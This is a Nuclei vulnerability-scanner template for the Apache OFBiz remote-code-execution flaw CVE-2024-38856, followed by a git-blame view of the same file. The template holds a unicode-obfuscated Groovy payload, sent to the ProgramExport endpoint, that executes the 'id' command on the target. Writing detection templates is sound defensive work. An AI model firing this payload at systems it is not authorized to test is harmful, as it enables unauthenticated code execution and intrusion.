nuclei-templates/http/cves/2024/CVE-2024-38856.yaml

id: CVE-2024-38856

info:
  name: Apache OFBiz - Remote Code Execution
  author: Co5mos
  severity: critical
  description: |
    Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).
  reference:
    - https://unam4.github.io/2024/08/05/CVE-2024-38856-ofbiz-12-14-filter%E7%BB%95%E8%BF%87%E5%88%B0rce/
    - https://issues.apache.org/jira/browse/OFBIZ-13128
    - https://lists.apache.org/thread/olxxjk6b13sl3wh9cmp0k2dscvp24l7w
    - https://ofbiz.apache.org/download.html
    - https://ofbiz.apache.org/security.html
  classification:
    epss-score: 0.00045
    epss-percentile: 0.16306
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="Apache_OFBiz"
  tags: cve,cve2024,ofbiz,apache,rce,kev

http:
  - raw:
      - |
        POST /webtools/control/main/ProgramExport HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'

      - type: word
        part: body
        words:
          - 'java.lang.Exception'

      - type: status
        status:
          - 200
# digest: 490a00463044022066dd5e35ba7d6f8a35012135f1805b18b90b904cc68abca73cac0ccd84757d3b02201593fa1abfc04c0ccebb25fd00318a83ae096b33748dbd7db8d074efda6c5847:922c64590222798bb761d5b6d8e72950
Create CVE-2024-38856.yaml 2024-08-05 09:16:52 +00:00			`id: CVE-2024-38856`

			`info:`
Update CVE-2024-38856.yaml 2024-08-06 13:23:48 +00:00			`name: Apache OFBiz - Remote Code Execution`
Create CVE-2024-38856.yaml 2024-08-05 09:16:52 +00:00			`author: Co5mos`
			`severity: critical`
			`description: \|`
Update CVE-2024-38856.yaml 2024-08-06 13:23:48 +00:00			`Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).`
Create CVE-2024-38856.yaml 2024-08-05 09:16:52 +00:00			`reference:`
			`- https://unam4.github.io/2024/08/05/CVE-2024-38856-ofbiz-12-14-filter%E7%BB%95%E8%BF%87%E5%88%B0rce/`
Update CVE-2024-38856.yaml 2024-08-06 13:23:48 +00:00			`- https://issues.apache.org/jira/browse/OFBIZ-13128`
			`- https://lists.apache.org/thread/olxxjk6b13sl3wh9cmp0k2dscvp24l7w`
			`- https://ofbiz.apache.org/download.html`
			`- https://ofbiz.apache.org/security.html`
			`classification:`
			`epss-score: 0.00045`
			`epss-percentile: 0.16306`
Create CVE-2024-38856.yaml 2024-08-05 09:16:52 +00:00			`metadata:`
Update CVE-2024-38856.yaml 2024-08-06 13:23:48 +00:00			`verified: true`
			`max-request: 1`
			`fofa-query: app="Apache_OFBiz"`
CVE-2024-38856 kev tag 2024-08-08 18:59:23 +00:00			`tags: cve,cve2024,ofbiz,apache,rce,kev`
Create CVE-2024-38856.yaml 2024-08-05 09:16:52 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /webtools/control/main/ProgramExport HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`part: body`
			`regex:`
			`- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'`

Update CVE-2024-38856.yaml 2024-08-06 13:23:48 +00:00			`- type: word`
			`part: body`
			`words:`
			`- 'java.lang.Exception'`

Create CVE-2024-38856.yaml 2024-08-05 09:16:52 +00:00			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Tue Aug 6 15:17:22 UTC 2024] :robot: 2024-08-06 15:17:22 +00:00			`# digest: 490a00463044022066dd5e35ba7d6f8a35012135f1805b18b90b904cc68abca73cac0ccd84757d3b02201593fa1abfc04c0ccebb25fd00318a83ae096b33748dbd7db8d074efda6c5847:922c64590222798bb761d5b6d8e72950`